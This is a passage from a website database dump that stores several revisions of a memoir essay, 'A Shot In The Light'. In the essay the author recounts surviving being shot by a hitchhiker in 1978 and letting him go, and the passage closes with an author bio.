goodbye. I said, “I love you.”\r\n\r\nAnother explosion shook the van, and my body pulsed. I was not hit. The bullet missed me by a fraction of an inch, penetrating the cupboard to my right. I relaxed back into the reverie of my life review. My luck could not hold out. If he held a revolver, there were three bullets to go. I hoped that the gun wasn’t a semi-automatic with a full clip.\r\n\r\nNothing mattered at that moment but to be at peace. My van, my money, my business, my knowledge, my personal history, my freedom—all became worthless, meaningless. In the face of dying, it was just dust in the wind.\r\n\r\nAll I had of value was my body and my life, and that was soon to be gone. My attention was focused on the spark of light I called my Self, and my consciousness began to expand outward, extending my awareness in space and time. I heard my instructions clearly: STAY AWAKE AND KEEP BREATHING.\r\n\r\nI prayed to my God, to the Great Spirit, to receive me with open arms. Love and light flowed through me, spreading out from my heart like a lighthouse beam, illuminating everything around me. The light itself grew inside me, expanding my awareness like a huge balloon until the van and its contents seemed small. A sense of peace and acceptance filled me. I knew I would soon be leaving my body. I could sense the timeline of my life, both backward through my history and forward to my death, and beyond. I saw the next bullet – a short distance into the future – leave the gun, jet toward my left temple, and exit with brains and blood on the right side of my head. I was filled with awe. To see life from this expanded perspective was like looking down into a dollhouse, seeing all the rooms at once, with every detail in sharp relief, so real and yet so unreal at the same time. I looked into the warm and welcoming golden light with calm and acceptance.\r\n\r\nThe fourth explosion shattered the silence, and my head was pushed violently to the side. The ringing in my ears was deafening. Warm blood rushed down my head and onto my arms and thighs, dripping onto the floor. But strangely, I found myself back in my body, not out of it. Still surrounded by light, love, and peace, I began looking inside my skull, trying to find the holes. Perhaps I could see light through them? I did a quick check of my feelings, abilities, thoughts, and sensations, looking for what might be missing. Surely the bullet had affected me. My head was throbbing, but I felt strangely normal.\r\n\r\nI decided to look at my assassin – to look death directly in the face. I picked up my head and turned my eyes toward him. He was shocked. Jumping up from his seat, he shouted, “Why aren’t you dead, man? You’re supposed to be dead!”\r\n\r\n“Here I am.” I said quietly.\r\n\r\n“That’s too weird! It’s just like my dream this morning! I kept shooting at him, but he wouldn’t die! But it wasn’t you in the dream, it was somebody else!”\r\n\r\nThis was very strange. Who was writing this script? I wondered. I began to speak slowly and calmly, trying to settle him down. If I could get him talking, I thought, maybe he wouldn’t shoot again. He kept yelling, “Shut up! Just shut up!” as he peered out the windows into the darkness. He nervously walked closer to me, gun in hand, examining my bloody head, trying to understand why the four bullets he had pumped into me hadn’t finished me off.\r\n\r\nI could still feel blood oozing down my face and could hear it dripping onto my shoulder. Ray said, “I don’t know why you aren’t dead, man. I shot you four times!”\r\n\r\n“Maybe I’m not supposed to die,” I said calmly.\r\n\r\n“Yeah, but I shot you!” he said, with disappointment and confusion in his voice. “I don’t know what to do.”\r\n\r\n“What do you want to do?” I asked.\r\n\r\n“I wanted to kill you, man, to take this van and drive away. Now I don’t know.” He seemed worried, uncertain. He was beginning to slow down, becoming less jumpy.\r\n\r\n“Why did you want to kill me?”\r\n\r\n“Because you had everything, and I had nothing. And I was tired of having nothing. This was my chance to have it all.” He was still pacing back and forth in the van, looking out the windows at the black night outside.\r\n\r\n”What do you want to do now?” I asked.\r\n\r\n“I don’t know, man,” he complained. “Maybe I should take you to the hospital.”\r\n\r\nMy heart leapt at this opportunity, this chance – a way out. “Okay,” I said, not wanting to make him feel out of control. I wanted it to be his idea, not mine. I knew that his anger sprang from feeling out of control, and I didn’t want to make him feel more angry.\r\n\r\n“Why were you so nice to me, man?” he asked plaintively.\r\n\r\n“Because you’re a person, Ray.”\r\n\r\n“But I wanted to kill you! I kept taking out my gun and pointing it at you, when you were asleep or not looking. But you were being so nice to me, I couldn’t do it.” He seemed forlorn, as if he were a little boy, disappointed in himself for failing.\r\n\r\nMy time sense was altered. I floated in a zone of ultra-reality, with no idea of how much time had passed since the first bullet. After what felt like many minutes, Ray came up to me, still in my crouched, locked-in position, and said, “Okay, man, I’m going to take you to a hospital. But I don’t want you to move, so I’m going to put some stuff on you so you can’t move, okay?”\r\n\r\nNow he was asking my permission. “Okay,” I said softly. He began taking boxes filled with samples and stacked them around me. “Are you okay?” he asked.\r\n\r\n“Yeah, I’m okay. A little uncomfortable, but it’s all right.”\r\n\r\n“All right, man. I’m going to take you to a hospital I know of. Now don’t move. And don’t die on me, okay?”\r\n\r\n“Okay,” I promised. I knew I wouldn’t die. This light, this power inside me was so strong, so certain. Each breath felt like my first, not my last. I was going to survive. I knew it. Ray lowered the pop-top of the van, secured the straps, and started up the engine. I could feel the van backing up on the dirt road, finding the pavement and moving forward to my freedom.\r\n\r\nHe drove on and on – to where, I had no idea. Were we bound for a hospital, as he said, or toward some horrible fate? If he was capable of killing me with a gun, he was capable of lying, or worse. How did he know where to go? We were in Claremont. Los Angeles was more than an hour away. As I sat alone in the dark van, I re-played the scenes and analyzed the past three days, trying to understand what had happened, and why.\r\n\r\nAfter an hour or so of deep contemplation and questioning everything in my life, I felt the van slow, pull over and stop. The engine was turned off. Silence filled the space. I waited. It was still dark outside. We had not pulled into a driveway. There were no lights. This was not a hospital.\r\n\r\nRay walked back toward me with his gun in his hand. He pulled away one of the boxes and sat down on the platform bed, turning toward me. He looked distraught. His head hung down. His words cut deep through my cloud of hope. “I have to kill you, man,” he said calmly.\r\n\r\n“Why?” I asked quietly.\r\n\r\n“If I take you to the hospital, they’ll put me back in jail. I can’t go back to jail, man. I can’t.”\r\n\r\n“They wouldn’t put you in jail if you take me to the hospital,” I said slowly, still feigning injury, passivity. I knew that I might find an opening, a moment when I could surprise him, overpower him, take away his gun. As long as he didn’t know I was okay, I had an advantage.\r\n\r\n“Oh yes they would, man. They’d know I shot you, and they’d lock me up.”\r\n\r\n“We don’t have to tell them. I won’t tell them.”\r\n\r\n“I can’t trust you, man. I wish I could, but I can’t. I can’t go back to jail, that’s all. I have to kill you.” He seemed forlorn. This was not where he wanted to be. He wasn’t making any moves. His gun hung limply from his hand, pointed down toward the floor. The boxes were still stacked around me. I couldn’t judge how much strength I had, whether it would be enough to push out and wrestle him down. He was small but strong. Was he still full of adrenaline? That would make him even stronger. My strength lay in words, in verbal swordplay. If I could keep him talking, he might not take stronger action.\r\n\r\n“Maybe I could go into the hospital alone, Ray. You wouldn’t even have to be there. You could get away.”\r\n\r\n“No, man,” he said, shaking his head. “As soon as you told them, they’d come find me. They’d track me down.”\r\n\r\nI was silent. That didn’t work, I noted. What could I do to escape this danger? The only answer I could find was to stay present in the moment. Keep breathing. Be awake to everything.\r\n\r\nHe said, “Why aren’t you dead, man? I shot you four times in the head. How come you’re still alive and talking? You should be dead! I know I didn’t miss.” He looked again at my head, taking it in one hand and turning it to the left and right. “Does it hurt?” he asked. He seemed genuinely concerned.\r\n\r\n“Yeah, it hurts,” I lied. “But I think I’m going to be okay.”\r\n\r\n“Well, I don’t know what to do. I can’t take you to the hospital. I can’t just let you go, because you’ll go to the police. Why were you so damn nice to me, man? No one’s ever been that nice to me before. It made it harder to kill you. You kept buying me stuff, and giving me stuff. I just couldn’t decide when to do it.”\r\n\r\nNot if, but when.\r\n\r\n“What would you do with all this stuff if you had it, Ray?” I asked.\r\n\r\n“I could go home and be somebody, I could do stuff. I’d have enough money to buy my way out of there, man.” Ray began to talk, weaving his sad tale. I listened deeply. He talked about his home in East Los Angeles, the poverty around him, his anger, the schoolteachers who made him feel stupid, his father who drank too much and beat him, and being a tough guy on the streets. He talked about joining the army, how that was supposed to make it work, but he couldn’t stand being told what to do all the time, so he went AWOL.\r\n\r\nHe talked about dealing drugs, and drug deals going bad, and how he ripped off his dealer buddies. That’s why he had to leave L.A., because they were looking for him. He talked about stealing his father’s gun and money before he left. Then his car broke down, and he realized there was no place to hide.\r\n\r\nHe decided to turn back. He could do one more rip-off and get rich. He just needed one hit, one sucker. If his target was rich enough, he could pay off the dealers and start over. So he decided to kill whoever stopped. Whoever came by to help him.\r\n\r\nI volunteered.\r\n\r\nThe night was turning to morning, the sky shifting slowly from dark indigo to deep blue. The sound of chirping birds was the most beautiful sound I had ever heard. I was grateful to be alive.\r\n\r\n“I’m pretty stiff and sore, Ray.  I’d feel better if I could get up and stretch.” I was still in the same position I had been locked in for six hours. Dried blood was plastered to my hair and face, my shins hurt from being pushed against the edge of a cupboard door, and my lower back was throbbing with a deep ache. My head felt like I had been hit hard with a baseball bat.\r\n\r\n“Okay, man.  I’m going to let you up – but don’t do anything stupid, okay?”\r\n\r\n“Okay, Ray. You just tell me what to do and I’ll do it.”\r\n\r\nRemind him that he is in control. Don’t let him feel out of control. Look for an opening.\r\n\r\nHe moved the boxes from around me, stepped back with the gun in his hand, and opened the door. I crawled slowly out of the van, stretching upright for the first time. How beautiful the world was to my new eyes. Everything shone as if made of sparkling crystal.\r\n\r\nWe had stopped on a residential street near an embankment with a small pond at the bottom. He gestured down the dirt trail that led to the water. As I walked down the steep incline I thought, “Is this death again, tapping on my shoulder? Will he shoot me in the back and push me into the water?”\r\n\r\nI felt weak and vulnerable, yet simultaneously immortal and impervious to his bullets. I walked erect and unafraid. He followed me to the water’s edge and stood by as I squatted down and rinsed my bloodied hands and face, splashing cool, fresh water on myself. I stood up slowly and faced Ray. He looked at me curiously.\r\n\r\n“What would you do if I handed you this gun right now?” he asked, holding the gun out to me.\r\n\r\nMy answer was my first thought: “I’d throw it out there, into the water.”\r\n\r\n“Aren’t you mad at me, man?” he asked. He seemed incredulous.\r\n\r\n“No, why should I be mad?”\r\n\r\n“I shot you, man!  You ought to be angry! I’d be fucking furious! You wouldn’t want to kill me if I gave you this gun?”\r\n\r\n“No, Ray, I wouldn’t. Why should I?  I have my life, and you have yours.”\r\n\r\n“I don’t understand you, man. You are really weird – really different than anyone I’ve ever met before. And I don’t know why you didn’t die when I shot you.”\r\n\r\nSilence. Better left unanswered.\r\n\r\nAs we stood at the water’s edge, I realized that Ray had undergone as profound a transformation as I had. We were both different people than we had been the day before.\r\n\r\n“What should we do now, Ray?”\r\n\r\n“I don’t know, man. I can’t take you to the hospital. I can’t let you go. I don’t know what to do.”\r\n\r\nWe continued to talk, seeking a solution to his dilemma. We explored the possibilities – what could we agree to? I made suggestions, he told me why they wouldn’t work. I made other suggestions. He listened, considered, rejected, and relented. We sought a compromise.\r\n\r\nUltimately, we found a bargain we could agree to: I would let him go, and he would let me go. I promised not to turn him in or report him to the police, but under one condition – he had to promise that he would never do anything like this again.\r\n\r\nHe promised. What choice did he have?\r\n\r\nAs the sun rose over the hills, we climbed back into the van. I sat in the passenger seat and he drove to a place that was familiar to him. He parked, and turned off the engine. I gave him all the cash I had – about $200 – and a couple of watches I thought he could pawn. We got out of the van and walked together across the street to a bus stop.\r\n\r\nThe sun was shining. It was early in the day but already warm. He had his army jacket and sleeping bag under one arm, his duffel bag slung over his shoulder. Somewhere in the bundle there was a black gun.\r\n\r\nWe shook hands. I smiled at him, and he continued to look confused. Then I said goodbye and walked away.\r\n\r\nIn the emergency room of L.A. County Hospital, a doctor scraped away small bits of metal, skin and hair, and sewed stitches into my scalp. He asked me how it had happened, and I told him, “I was shot, four times.”\r\n\r\n“You’re a lucky man,” he said. “The two bullets that hit you both glanced off your skull. You have to report this to the police, you know.”\r\n\r\n“Yes, I know,” I said.\r\n\r\nHe called me lucky, but I knew it was more than luck – I felt blessed. I didn’t go to the police. I had made a promise and had received a promise in return.\r\n\r\n<strong>I kept my promise. </strong>\r\n\r\n<strong>And I believe that Ray kept his.</strong>\r\n<p style="text-align: center;">. . .</p>\r\n&nbsp;\r\n\r\n<strong>About the Author</strong>\r\n\r\nLion Goodman is an author, teacher, coach, and healer.  He shares his wisdom through his <strong><em>Clear Your Beliefs</em></strong> program, and teaches his methodology to coaches and therapists around the world.  He is the author of <em>Clear Your Beliefs,</em> and <em>Creating On Purpose</em> (with Anodea Judith).  He provides transformative coaching and healing to people worldwide, helping them clear what''s in the way, and fulfill their dreams and life purpose. He is passionate about developing leadership and resiliency in businesspeople and in youth.\r\n\r\nThis story was first published in the book, <em>I Thought My Father Was God…and Other True Tales from NPR’s National Story Project</em>, edited by Paul Auster (Henry Holt, October 2001). A short feature film, <strong><em>“The Kindness of Strangers,”</em> </strong>was produced based on this story. Directed by Claudia Myers, it won “Best Film” at the Rosebud Film Festival. The 20-minute film can be viewed here: <a href="www.EverydayAwakening.com/video.html">www.EverydayAwakening.com/video.html</a>.\r\n\r\nI would enjoy hearing your feedback. Write to me at liongoodman@gmail.com.\r\n\r\n© 2008 by Lion Goodman. All rights reserved.', 'My Near Death Story', '', 'inherit', 'closed', 'open', '', '2071-revision-v1', '', '', '2014-12-29 23:54:47', '2014-12-30 04:54:47', '', 2071, 'http://clearyourbeliefs.com/2071-revision-v1', 0, 'revision', '', 0),
(2073, 2, '2017-08-01 23:17:48', '2017-08-02 04:17:48', '<h1 style="text-align: center;">A Shot In The Light</h1>\n<h3 style="text-align: center;">(A true story)</h3>\n<h2 style="text-align: center;">by Lion Goodman</h2>\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/12/films_kindness3.jpg"><img class="aligncenter size-full wp-image-2414" src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/films_kindness3.jpg" alt="films_kindness3" width="200" height="298" /></a>\n\nDuring the summer of 1978, I was a traveling salesman, driving through the southwest states, wandering through cities and towns, selling jewelry and giftware to stores along the way. I had just completed a productive week in Las Vegas, making many sales. I felt pretty good. I was heading toward Los Angeles.\n\nIn the middle of the Mojave Desert, I saw a motorist whose car had broken down. The car''s hood was up, and he was staring helplessly into the motor, standing in 100+ degree heat.  As was my habit, I pulled over to offer him assistance. His car was dead, and he was frustrated. He had no money to fix the car, and no way out of his situation. I felt sorry for him. So I invited him to travel with me. I was headed into L.A., his destination, and I had room in my van.\n\nHis name was Ray, and he looked to be in his early twenties. He was small, muscular, wiry, and slightly gaunt, as if underfed. He traveled with me for three days, and over time, I grew to trust him. I sent him on errands while I visited stores to sell my wares. At one point, I gave him some of my clothes, and it pleased him to have something new to wear. He seemed calm, and mostly satisfied.\n\nOn our third night of travel, we camped out next to Puddingstone Reservoir, east of Claremont. I was sitting on the floor in the back of my large van, moving things around in the cupboards to make more room for all the stuff that was piled up – my clothes, books, food, boxes of samples, and Ray’s duffel bag and travel gear. I was in a practical frame of mind, focused on my task, listening to the music that Ray was playing on the radio at the front of the van.\n\nThere was a sudden, loud explosion. I felt a sharp, searing blow to the top of my head. Had the gas stove exploded, I wondered? I looked up, but it was intact. Then I looked at Ray. He was sitting in the driver’s seat, and I saw a black gun in his hand. His arm was resting on the back of the seat, aiming the pistol at my face. A bullet had hit me! My first thought was, "He''s warning me – he''s going to rob me." That suddenly seemed just fine. “Take it all,” I thought. “Take it all. Just leave me outside and drive away.”\n\nAnother explosion shook me, and my ears rang with a terrible, high-pitched whine. I felt blood dripping down my face. The top of my head throbbed. He’s not warning me, I realized. He’s going to kill me. I am going to die.\n\nThere was no place to hide. I was stuck in an uncomfortable position surrounded by cabinets. There was nothing I could do. I heard a soft voice in my mind say, “Relax. It’s out of your control. Keep breathing, and stay awake.” I began to breathe slowly, assessing the situation.\n\nMy thoughts turned to my inevitable death. There was nothing I could do to change the sequence of events. So my attention turned to God. “Thy will, not my will, be done,” I thought. I let go of my body, and my tension, relaxing and slumping back against the cabinet. I watched my breath flow in and out, in and out, in and out….\n\nI began to prepare for death. I didn''t want to die angry, upset, or incomplete. I began by asking for forgiveness – from all those I had hurt during my 26 years of life. I then offered my own forgiveness to everyone who had hurt me throughout my life. This began a full-color fast-reverse movie reel of my life, back to my birth. I thought about my parents, my brothers and sisters, my lovers, and my many good friends. I said goodbye. I said, “I love you.”\n\nAnother explosion shook the van, and my body pulsed. I was not hit. The bullet missed me by a fraction of an inch, penetrating the wood cupboard to my right. I relaxed back into the reverie of my life review. My luck could not hold out. If the gun was a revolver, there were three more bullets. I hoped that the gun wasn’t a semi-automatic with a full clip.\n\nNothing mattered at that moment but to be at peace. My van, my money, my business, my knowledge, my personal history, my ideas, my freedom — all became worthless, meaningless. In the face of death, it was just dust in the wind.\n\nAll I had of value at that moment was my body, and my life, and those would soon be gone. My attention was focused on the spark of light I called my Self. My consciousness began to expand outward, extending my awareness in space and time. I heard those instructions again: STAY AWAKE AND KEEP BREATHING.\n\nI prayed to my God, to the Great Spirit, to receive me with open arms. Love and light flowed into me from that Source, spreading out from my heart like a lighthouse beam, illuminating everything around me. The light itself grew inside me, expanding my awareness like a huge balloon until the van and its contents seemed small. A sense of peace and acceptance filled me. I knew I would soon be leaving my body. I could sense the timeline of my life, both backward through my history to my birth, and forward to my death. I could see the next bullet, a short distance into the future, leave the gun, jet toward my left temple, and exit with brains and blood on the right side of my head. I was filled with awe to see life from this expanded perspective. I was floating above the van, as a point of consciousness, like looking down into a dollhouse, seeing all the rooms at once. Every detail was in sharp relief, both real and unreal at the same time. I looked into the warm and welcoming golden light with calm acceptance. I was going Home.\n\nThe fourth explosion shattered the silence, and my head was pushed violently to my right side. The ringing in my ears was deafening. Warm blood rushed down my head, into my eyes and onto my arms and thighs, dripping onto the floor. But strangely, I found myself back in my body, not out of it. I was still surrounded by light, love, and peace. "That''s interesting!," I thought. "I''m still alive!" I began to look inside my skull, trying to find the holes. Perhaps I could see light through them? Knowing myself well, I began to inventory my feelings, abilities, thoughts, and sensations. I was looking for what might be missing. Surely the bullet had affected me. My head was throbbing, but I felt strangely normal.\n\nAt that moment, I realized that I wanted to to look at my assassin – the bringer of death – directly in the eyes. I picked up my head and faced him. He was shocked. Jumping up from his seat, he shouted, “Why aren’t you dead, man? You’re supposed to be dead!”\n\nI didn''t know the answer to his question. “Here I am.” I said quietly, still in my expanded state of consciousness.\n\n“That’s too weird! This is just like my dream this morning!"\n\n"What dream?," I asked.\n\nHe was now shouting. "In my dream, I kept shooting this guy, but he wouldn’t die! But it wasn’t you in the dream, it was somebody else!”\n\nThis was very strange. "Who is writing this script?," I wondered. I knew that if I could keep him talking, he might not shoot again. I began to speak slowly and calmly, trying to settle him down. He kept yelling, “Shut up! Just shut up!” as he peered out the windows into the darkness. He nervously walked closer to me, gun in hand, examining my bloody head, trying to understand why four bullets hadn’t finished me off.\n\nBlood continued to ooze down my face. I could hear it dripping onto my shoulder. Ray said, “I don’t know why you aren’t dead, man. I shot you four times!”\n\n“Maybe I’m not supposed to die,” I said calmly.\n\n“Yeah, but I shot you!” he said, with disappointment and confusion in his voice. “Now I don’t know what to do!”\n\n“What do you want to do?” I asked.\n\n“I wanted to kill you, man, to take this van and drive away. Now I don’t know.”\n\nHe seemed worried, uncertain. He was beginning to slow down, less adrenalin coursing through his veins, less jumpy.\n\n“Why did you want to kill me?” I asked.\n\n“Because you have everything, and I have nothing. And I''m tired of having nothing! This was my chance to have it all.” He was still pacing back and forth in the van, looking out the windows at the black night outside.\n\n”What do you want to do now, Ray?” I asked.\n\n“I don’t know, man,” he complained. “Maybe I should take you to the hospital.”\n\nMy heart leapt at this opportunity, this chance – a way out. “Okay,” I said, quietly. I didn''t want him to feel out of control. It had to be his idea, not mine. I knew his anger sprang from feeling out of control, and I didn’t want to make him more angry.\n\n“Why were you so nice to me, man?” he asked plaintively.\n\n“Because you’re a person, Ray.”\n\n“But I wanted to kill you! I kept taking out my gun and pointing it at you, when you were asleep or not looking. But you were being so nice to me, I couldn’t do it.” He seemed forlorn, as if he was a little boy, disappointed in himself for failing. Ashamed.\n\nMy time sense was altered. I floated in a zone of ultra-reality, with no idea of how much time had passed since the first bullet. After what felt like many minutes, Ray came up to me, still in my crouched, locked-in position, and said, “Okay, man, I’m going to take you to a hospital. But I don’t want you to move, so I’m going to put some stuff on you so you can’t move, okay?”\n\nNow he was asking my permission. “Okay,” I said softly. He began stacking boxes, filled with samples, around me. “Are you okay?” he asked.\n\n“Yeah, I’m okay. A little uncomfortable, but it’s all right.” He was expressing genuine care. I quieted the hope springing out of me.\n\n“All right, man. I’m going to take you to a hospital I know of. Now don’t move. And don’t die on me, okay?”\n\n“Okay,” I promised. I knew I wouldn’t die. This light, this power inside me was strong, and certain. Each breath felt like my first, not my last. I was going to survive. I knew it. Ray lowered the pop-top of the van, secured the straps, and started up the engine. I could feel the van back up on the dirt road, find the pavement and move forward into the night – toward my freedom and salvation.\n\nHe drove on and on – to where, I had no idea. Were we bound for a hospital, as he said, or toward an even more horrible fate? If he was capable of killing me with a gun, he was capable of lying, or worse. How did he know where to go? We were more than an hour away from Los Angeles. As I sat alone in the back of the dark van, listening to the sounds of the highway, I replayed the scenes, one by one, analyzing the past three days. I was trying to understand what had happened, and why. It didn''t make any kind of sense. I had treated Ray only with kindness and respect, and he turned on me. I had welcomed a crazy person with a gun into my life.\n\nAfter an hour or so of deep contemplation and questioning everything, I felt the van slow, pull over and stop. The engine turned off. Silence filled the space. I waited. It was still dark outside. We had not pulled into a driveway. There were no lights. This was not a hospital.\n\nRay walked back toward me with his gun in his hand. He sat down on the platform bed next to me, and turned toward me. He looked distraught. His head hung down. His words cut deep through my cloud of hope. “I have to kill you, man,” he said calmly. "Oh shit," I thought. I tried to remain calm.\n\n“Why?” I asked quietly.\n\n“If I take you to the hospital, they’ll put me back in jail. I can’t go back to jail, man. I can’t.”\n\nBack in jail? Not only was I with an armed madman, but an ex-con as well.\n\n“They won’t put you in jail if you take me to the hospital, Ray,” I said slowly, still feigning injury, passivity. I realized that an opening might occur, a moment when I could surprise him, overpower him, and take away his gun. If he didn’t know I was okay, and strong, I had an advantage.\n\n“Oh yes they would, man. They’d know I shot you, and they’d lock me up.”\n\n“We don’t have to tell them. I won’t tell them.”\n\n“I can’t trust you, man. I wish I could, but I can’t. I can’t go back to jail, that’s all. I have to kill you.”\n\nHe seemed sad, and desperate. This was clearly not where he wanted to be. He wasn’t making any moves. His gun hung limply from his hand, pointed down toward the floor. The boxes were still stacked around me. I couldn’t judge how much strength I had, or whether it would be enough to push myself out and wrestle him down. He was small, but strong. Was he still full of adrenaline? That would make him even stronger. My strength lay in words, in verbal swordplay. If I could keep him talking, he might not take stronger action.\n\n“Maybe I could go into the hospital alone, Ray. You wouldn’t even have to be there. You could get away.”\n\n“No, man,” he said, shaking his head. “As soon as you told them, they’d come find me. They’d track me down.”\n\nI was silent. That didn’t work. What could I do to escape? The only answer I could find was to stay present in the moment. Keep breathing. Be awake to everything.\n\nHe said, “Why aren’t you dead, man? I shot you four times in the head. How come you’re still alive and talking? You should be dead! I know I didn’t miss.” He looked again at my head, taking it in one hand and turning it to the left and right. “Does it hurt?” he asked. He expressed genuine concerned.\n\n“Yeah, it hurts,” I lied. “But I think I’m going to be okay.”\n\n“Well, I don’t know what to do. I can’t take you to the hospital. I can’t just let you go, because you’ll go to the police. Why were you so damn nice to me, man? No one’s ever been that nice to me before. It made it harder to kill you. You kept buying me stuff, and giving me stuff. I just couldn’t decide when to do it.”\n\nNot if, but when.\n\n“What would you do with all this stuff if you had it, Ray?” I asked.\n\n“I could go home and be somebody, I could do stuff. I’d have enough money to buy my way out of there, man.” Ray began to talk, weaving his sad tale. I listened deeply as he talked about growing up in poverty in East L.A., with poverty everywhere around him. He talked about his anger at the schoolteachers who made him feel stupid. He talked about his father who drank too much and beat him. He talked about becoming a tough guy on the streets, and how he found a way out. He joined the Army. That was supposed to fix everything. But he couldn’t stand being told what to do all the time, so he went AWOL.\n\nHe talked about dealing drugs, and drug deals going bad, and how he ripped off his dealer. That’s why he had to leave L.A., because they were looking for him, to kill him. He told me that he stole his father’s gun, and some money, before he left. Then his car broke down, and he realized there was no place to hide.\n\nHe had decided to turn back. If he did one more rip-off, he could get rich, and pay off the dealer. He just needed one hit, one sucker. If his target was rich enough, he could start over and be somebody. So he decided to kill whoever stopped to help him.\n\nI had apparently volunteered.\n\nThe night was turning to morning, the sky shifting slowly from dark indigo to deep blue. I could hear the sound of chirping birds, which was the most beautiful sound I had ever heard. I was grateful to be alive.\n\n“I’m pretty stiff and sore, Ray.  I’d feel better if I could get up and stretch,” I told him. I had been sitting in the same position for six hours. Dried blood was plastered to my hair and face, my shins hurt from being pushed against the edge of a cupboard door. My lower back was throbbing with a deep ache. My head felt like I had been hit hard with a baseball bat.\n\n“Okay, man.  I’m going to let you up – but don’t do anything stupid, okay?”\n\n“Okay, Ray. You just tell me what to do and I’ll do it.”\n\nI wanted to remind him that he was in control. Don’t let him feel out of control. Look for an opening.\n\nHe moved the boxes from around me, stepped back with the gun in his hand, and opened the door. I crawled slowly out of the van, stretching upright for the first time. How beautiful the world was to my new eyes! Everything was shining, as if made of sparkling crystal.\n\nWe had stopped on a residential street next to an embankment, which led down to a small pond. He gestured with his gun that I should walk down the dirt trail that led to the water. As I clambered down the steep incline, I wondered, “Is this death again, tapping on my shoulder? Will he shoot me in the back and push me into the water?”\n\nI felt weak and vulnerable, yet at the same time, immortal, impervious to his bullets. I walked erect and unafraid. He followed me to the water’s edge and stood by as I squatted down and rinsed my bloodied hands and face, splashing cool, fresh water on myself. I stood up slowly and faced him. He looked at me curiously.\n\n“What would you do if I handed you this gun right now?” he asked, holding the gun out to me.\n\nMy answer was my first thought: “I’d throw it out there, into the water.” I pointed to the center of the pond.\n\n“Aren’t you mad at me, man?” he asked. He seemed incredulous.\n\n“No, why should I be mad?”\n\n“I shot you, man!  You ought to be angry! I’d be fucking furious! Are you sure you wouldn’t want to kill me if I gave you this gun?” He held out the gun again, as if inviting me to take it, and kill him.\n\n“No, Ray, I wouldn’t. Why should I?  I have my life, and you have yours.”\n\n“I don’t understand you, man. You are really weird, really different than anyone I’ve ever met before. I don’t know why you didn’t die when I shot you, man.”\n\nSilence. That question was best left unanswered.\n\nAs we stood at the water’s edge, I realized that Ray had undergone a profound transformation – as profound as the one I had undergone. We were both different people than we had been the day before.\n\n“What should we do now, Ray?”\n\n“I don’t know, man. I can’t take you to the hospital. I can’t let you go. I don’t know what to do.”\n\nWe continued to talk, as we walked back up the hill to the van, where we sat together, seeking a solution to this dilemma. We explored the possibilities – what could we agree to? I made suggestions, and he told me why they wouldn’t work. I made other suggestions. He listened, considered, rejected, and relented. We sought a compromise. A way out.\n\nUltimately, we found a bargain we could both agree to: I would let him go, and he would let me go. I promised not to turn him into the police, or report the incident, under one condition – he had to promise that he would never do anything like this again.\n\nHe promised. We shook hands on the deal.\n\nWhat choice did he have?\n\nAs the sun rose over the hills, and the heat of the day began, we climbed back up to the front of the van. I sat in the passenger seat. He drove to a place that was familiar to him. He parked, and turned off the engine. I gave him all the cash I had – about $200 – and two watches I thought he could pawn. We got out of the van and walked across the street to a bus stop.\n\nThe sun shone down on us. He had his army jacket and sleeping bag under one arm, his duffel bag slung over his shoulder. Somewhere in the bundle there was a black gun.\n\nWe shook hands one final time. I smiled at him, and he look confused. I said goodbye, and walked away.\n\nIn the emergency room of L.A. County Hospital, a doctor scraped away small bits of metal, skin and hair from my scalp, and sewed stitches. He asked me how it had happened. I told him, “I was shot, four times.”\n\n“You’re a lucky man,” he said. “The two bullets that hit you both glanced off your skull. You have to report this to the police, you know.”\n\n“Yes, I know,” I said.\n\nHe said I was lucky, but I knew it was more than luck. I felt blessed. I was still full of love, and light.\n\nI didn’t go to the police. I had made a promise, and had received a promise in return.\n\n<strong>I kept my promise. </strong>\n\n<strong>And I believe that Ray kept his.</strong>\n<p style="text-align: center;">. . .</p>\n&nbsp;\n\n<strong>About the Author</strong>\n\nLion Goodman is an author, teacher, coach, and healer.  He shares his wisdom through his <strong><em>Clear Your Beliefs</em></strong> program, and teaches his methodology to coaches and therapists around the world.  He is the author of <em>Clear Your Beliefs,</em> and <em>Creating On Purpose</em> (with Anodea Judith).  He provides transformative coaching and healing to people worldwide, helping them clear what''s in the way so they can fulfill their dreams and manifest their life purpose. He loves to work with leaders, helping them develop their virtues and embody their True Self. He also loves to work with young people, like Ray, who are seeking a better life.\n\nThis story was first published in the book, <em>I Thought My Father Was God… and Other True Tales from NPR’s National Story Project</em>, edited by Paul Auster (Henry Holt, October 2001). It was used as the basis for a screenplay for the award-winning film, <strong><em>“The Kindness of Strangers.”</em> </strong> Directed by Claudia Myers, which won “Best Film” at the Rosebud Film Festival. The 20-minute film can be viewed here: <a href="http://www.EverydayAwakening.com/video.html">www.EverydayAwakening.com/video.html</a>.\n\nI would enjoy hearing your feedback or questions. Write to me at <a href="mailto:liongoodman@gmail.com">liongoodman@gmail.com</a>.\n\n© 2008 by Lion Goodman. All rights reserved.', 'My Near Death Story', '', 'inherit', 'closed', 'open', '', '2071-autosave-v1', '', '', '2017-08-01 23:17:48', '2017-08-02 04:17:48', '', 2071, 'http://clearyourbeliefs.com/2071-autosave-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2074, 2, '2015-01-01 12:39:50', '2015-01-01 17:39:50', '<h1 style="text-align: center;">A Shot In The Light</h1>\r\n<h3 style="text-align: center;">(A true story)</h3>\r\n<h2 style="text-align: center;">by Lion Goodman</h2>\r\n&nbsp;\r\n\r\nIt happened during the summer of 1978. I was traveling through the Southwest, selling jewelry and giftware to stores as I wandered through towns and cities.  I had left Las Vegas, feeling good about my productive week there, and was heading Los Angeles.\r\n\r\nIn the middle of the Mojave Desert, I saw a motorist whose car had broken down. The car''s hood was up, and he was staring helplessly into the motor in the 100 degree heat.  I pulled over to offer him assistance. He was down on his luck, had no plans, no money, and nowhere to go. So I invited him to travel with me.\r\n\r\nHis name was Ray, and he looked to be in his early twenties. He was small, muscular, wiry, and slightly gaunt, as if underfed. I felt sorry for him, and in the three days we were together, I grew to trust him. I sent him on small errands while I visited stores to sell my wares. At one point, I gave him some of my clothes, and it pleased him to have something new to wear. He seemed calm and mostly satisfied.\r\n\r\nThe third night, we 